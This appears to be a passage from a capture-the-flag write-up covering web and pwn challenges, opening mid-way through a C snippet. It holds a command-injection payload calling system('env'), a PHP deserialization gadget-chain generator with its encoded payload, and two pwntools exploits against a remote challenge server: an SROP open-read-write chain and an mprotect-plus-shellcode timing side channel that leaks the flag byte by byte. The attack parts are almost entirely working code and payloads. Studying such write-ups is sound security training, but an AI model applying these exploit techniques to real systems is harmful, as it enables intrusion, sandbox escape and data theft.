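    printf("%s", result);
    free(result);
    return 0;
}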
WEB
what’s my name
?d0g3=’”]);}system(‘env’);;;;/*include&name=%00lambda_32
跑32次
easy_unserialize
<?php
// Gadget-chain generator for easy_unserialize. The class layouts below
// mirror the target's classes: property names, visibility and order must
// match exactly because they determine the serialized form (private
// properties serialize with the "\0Class\0name" prefix seen in the payload).
class Good
{
    public $g1;
    private $gg2 = '*&';
}

class Luck
{
    public $l1;
    public $ll2;
    private $md5 = 1131911;
    public $lll3;
}

class To
{
    public $t1;
    public $tt2;
    public $arg1 = array("guangji" => 1);
}

class You
{
    public $y1;
}

class Flag
{
}

// Innermost object: a Flag carrying an SplFileObject property that holds the
// path the writeup reads, plus an empty "b" property.
$F = new Flag;
$F->SplFileObject = "/FfffLlllLaAaaggGgGg";
$F->b = "";

// Nest outward: Luck -> To -> Luck -> To -> Good -> Luck -> You, each object
// holding the previous one in the property the chain passes through.
$l2 = new Luck;
$l2->l1 = $F;
$t2 = new To;
$t2->t1 = $l2;
$l = new Luck;
$l->ll2 = $t2;
$t = new To;
$t->tt2 = $l;
$g = new Good;
$g->g1 = $t;
$r = new Luck;
$r->lll3 = $g;
$q = new You;
$q->y1 = $r;

// URL-encode so the NUL bytes of the private-property names survive the request.
echo urlencode(serialize($q));
payload
D0g3=O%3A3%3A%22You%22%3A1%3A%7Bs%3A2%3A%22y1%22%3BO%3A4%3A%22Luck%22%3A4%3A%7Bs%3A2%3A%22l1%22%3BN%3Bs%3A3%3A%22ll2%22%3BN%3Bs%3A9%3A%22%00Luck%00md5%22%3Bi%3A1131911%3Bs%3A4%3A%22lll3%22%3BO%3A4%3A%22Good%22%3A2%3A%7Bs%3A2%3A%22g1%22%3BO%3A2%3A%22To%22%3A3%3A%7Bs%3A2%3A%22t1%22%3BN%3Bs%3A3%3A%22tt2%22%3BO%3A4%3A%22Luck%22%3A4%3A%7Bs%3A2%3A%22l1%22%3BN%3Bs%3A3%3A%22ll2%22%3BO%3A2%3A%22To%22%3A3%3A%7Bs%3A2%3A%22t1%22%3BO%3A4%3A%22Luck%22%3A4%3A%7Bs%3A2%3A%22l1%22%3BO%3A4%3A%22Flag%22%3A2%3A%7Bs%3A13%3A%22SplFileObject%22%3Bs%3A20%3A%22%2FFfffLlllLaAaaggGgGg%22%3Bs%3A1%3A%22b%22%3Bs%3A0%3A%22%22%3B%7Ds%3A3%3A%22ll2%22%3BN%3Bs%3A9%3A%22%00Luck%00md5%22%3Bi%3A1131911%3Bs%3A4%3A%22lll3%22%3BN%3B%7Ds%3A3%3A%22tt2%22%3BN%3Bs%3A4%3A%22arg1%22%3Ba%3A1%3A%7Bs%3A7%3A%22guangji%22%3Bi%3A1%3B%7D%7Ds%3A9%3A%22%00Luck%00md5%22%3Bi%3A1131911%3Bs%3A4%3A%22lll3%22%3BN%3B%7Ds%3A4%3A%22arg1%22%3Ba%3A1%3A%7Bs%3A7%3A%22guangji%22%3Bi%3A1%3B%7D%7Ds%3A9%3A%22%00Good%00gg2%22%3Bs%3A2%3A%22%2A%26%22%3B%7D%7D%7D
PWN
seccomp
一个输入长gadget的全局变量,一次溢出机会
有沙箱,但是可以orw读出flag,借助一部分srop的手法加以利用
from pwn import *
import time
import subprocess

context(arch='amd64', os='linux', log_level='debug')
command = "ls -l"  # not referenced anywhere in the visible script
#p = process('./chall')
p = remote("47.108.206.43", 22039)
elf = ELF("./chall")  # local copy of the challenge binary; used for elf.plt['syscall'] below
#libc = ELF("./libc-2.23.so")
#libc = ELF("./libc.so.6")
#context(arch="amd64",os="linux",log_level="debug")


# Short-hand wrappers around the pwntools tube `p`.
def s(a):
    """p.send(a)."""
    p.send(a)


def sa(a, b):
    """p.sendafter(a, b)."""
    p.sendafter(a, b)


def sl(a):
    """p.sendline(a)."""
    p.sendline(a)


def sla(a, b):
    """p.sendlineafter(a, b)."""
    p.sendlineafter(a, b)


def r():
    """Return p.recv()."""
    return p.recv()


def pr():
    """Print whatever p.recv() returns."""
    print(p.recv())


def rl(a):
    """Return p.recvuntil(a)."""
    return p.recvuntil(a)


def inter():
    """Hand the tube over to the user."""
    p.interactive()


def get_addr():
    """Read up to the next 0x7f byte and unpack the last 6 bytes as a
    little-endian 64-bit value (zero-padded to 8 bytes)."""
    leaked = p.recvuntil(b'\x7f')[-6:]
    return u64(leaked.ljust(8, b'\x00'))
#752leave = 0x40136csig = 0x0000000000401194sy = 0x000000000040118a#gdb.attach(p)
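def _frame(nr, a1, a2, a3, rsp):
    """Build one SigreturnFrame that returns into the binary's syscall PLT entry.

    The register layout is the one the original three frames used: rdi carries
    the number and rsi/rdx/rcx the first three arguments, which implies the PLT
    target is a libc-style `syscall(number, ...)` wrapper rather than a raw
    `syscall` instruction - NOTE(review): confirm against the binary.
    rbp is parked in the .bss area at 0x404060 where the chain is staged and
    rsp selects where execution continues after the call.
    """
    frame = SigreturnFrame()
    frame.rax = 0
    frame.rdi = nr
    frame.rsi = a1
    frame.rdx = a2
    frame.rcx = a3
    frame.rip = elf.plt['syscall']
    frame.rbp = 0x404060 + 0x20
    frame.rsp = rsp
    return frame


# The first 8 bytes sent below place "./flag\0\0" at 0x404060, so the three
# frames perform open(0x404060, 0, 0), read(3, 0x404560, 0x30) and
# write(1, 0x404560, 0x30); fd 3 assumes no other descriptor is open.
# Each frame's rsp points at the next sig/sy pair so the frames chain.
opena = _frame(2, 0x404060, 0, 0, 0x404170)
read1 = _frame(0, 3, 0x404560, 0x30, 0x404170 + (0x404170 - 0x404060) - 8)
write = _frame(1, 1, 0x404560, 0x30, 0x404170 + (0x404170 - 0x404060))

sla("easyhack", b'./flag\x00\x00'
    + p64(sig) + p64(sy) + flat(opena)
    + p64(sig) + p64(sy) + flat(read1)
    + p64(sig) + p64(sy) + flat(write))

# The single overflow: 0x2a bytes of filler, a saved rbp of 0x404060 and the
# `leave` gadget, which moves the stack onto the staged chain.
sla("SUID?", b'a' * (0x2a) + p64(0x404060) + p64(leave))

p.interactive()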
side_channel,initiate!
from pwn import *
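context.log_level = 'ERROR'
context.terminal = ['wt.exe', 'wsl.exe', 'bash', '-c']   # Windows Terminal + WSL, for gdb.attach
context.binary = './chall'
binary = context.binary

# Target selection. pwntools' `args` yields '' for an unset variable, so the
# original `args.REMOTE or 1` defaulted to remote - but `REMOTE=0` produced
# the string '0', which is truthy, so the local path could never be chosen.
# Converting to int makes REMOTE=0 select process('./chall').
REMOTE = int(args.REMOTE or 1)

syscall = 0x40118A   # address in ./chall used as the `syscall` gadget (per the script) - confirm in the binary
bss = 0x404060       # start of the writable .bss area the shellcode and frame are staged in
FLAG = '/flag'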
# Shellcode: open the flag, read it into bss+0xE00 (= 0x404E60), then act as
# a comparison oracle for one byte:
#   read(0, 0x404F60, 2)            -> (idx, ch) from stdin
#   rcx = idx, rax = ch, rbx = flag[idx]
#   if ch >= flag[idx]: block on read(0, 0x404F60, 1)   (slow answer)
#   else:               exit(0)                          (fast answer)
# The caller (test() below) measures the delay to tell the two apart.
code = shellcraft.open(FLAG, 'O_RDONLY', 'rdx')
code += shellcraft.read(3, bss+0xE00, 0x100)
code += '''
    xor eax, eax
    mov rdi, 0
    mov rsi, 0x404F60
    mov rdx, 2
    syscall

    movzx rcx, byte ptr [0x404F60]
    movzx rax, byte ptr [0x404F61]
    movzx rbx, byte ptr [0x404E60+rcx]
    cmp rax, rbx
    jge L_HANG
    jmp L_EXIT
L_HANG:
    xor eax, eax
    mov rdi, 0
    mov rsi, 0x404F60
    mov rdx, 1
    syscall
L_EXIT:
'''
code += shellcraft.exit(0)

shellcode = asm(code)
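def test(idx, ch):
    """Query the timing oracle once: is ch >= flag[idx]?

    Runs the full exploit on a fresh connection: stage one sends the
    shellcode plus a sigreturn frame that calls mprotect(0x404000, 0x1000, 7)
    and pivots rsp into .bss; stage two overflows with 0x2A bytes, a saved
    rbp of bss+0x100 and a `leave; ret` address so execution reaches the
    shellcode. Then (idx, ch) is sent and the time p.clean(0.3) takes is
    measured: the shellcode blocks when ch >= flag[idx] (see the assembly
    above) and exits otherwise.

    Returns True when the wait exceeded 0.28 s, i.e. ch >= flag[idx].
    The connection is closed even if a step raises.
    """
    if REMOTE:
        p = remote('47.108.206.43', 37910)
    else:
        p = process('./chall')
    try:
        pay1 = shellcode
        pay1 = pay1.ljust(0x100, b'A')
        pay1 += b'A' * 0x8
        pay1 += p64(0x401193)
        pay1 += p64(syscall)

        frame = SigreturnFrame()
        frame.rax = constants.SYS_mprotect
        frame.rdi = 0x404000
        frame.rsi = 0x1000
        frame.rdx = 7            # PROT_READ | PROT_WRITE | PROT_EXEC
        frame.rsp = bss + 0x210
        frame.rip = 0x401186
        pay1 += bytes(frame)
        pay1 += p64(0x404060)

        # gdb.attach(p, 'b *0x40118E')
        # sleep(1)

        p.sendafter(b"easyhack\n", pay1)
        p.recvline()
        payload = b'A' * 0x2A
        payload += p64(bss + 0x100)
        payload += p64(0x401441)  # leave; ret
        p.send(payload)
        p.send(p8(idx) + bytes([ch]))
        t = time.time()
        p.clean(0.3)
        t = time.time() - t
    finally:
        p.close()
    print(t)
    return t > 0.28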
flag = ""
# Resume support: pre-filling `flag` with already-recovered characters makes
# the search continue from that position.
for i in range(len(flag), 36):
    # Binary search over 0x2D..0x66 for the smallest ch with test(i, ch)
    # True, which is the flag character itself.
    lo, hi = 0x2D, 0x66
    while lo < hi:
        mid = (lo + hi) // 2
        if test(i, mid):
            hi = mid
        else:
            lo = mid + 1
        print(lo, hi, chr(lo), chr(hi))
    flag += chr(lo)
    print(flag)

print('flag{' + flag + '}')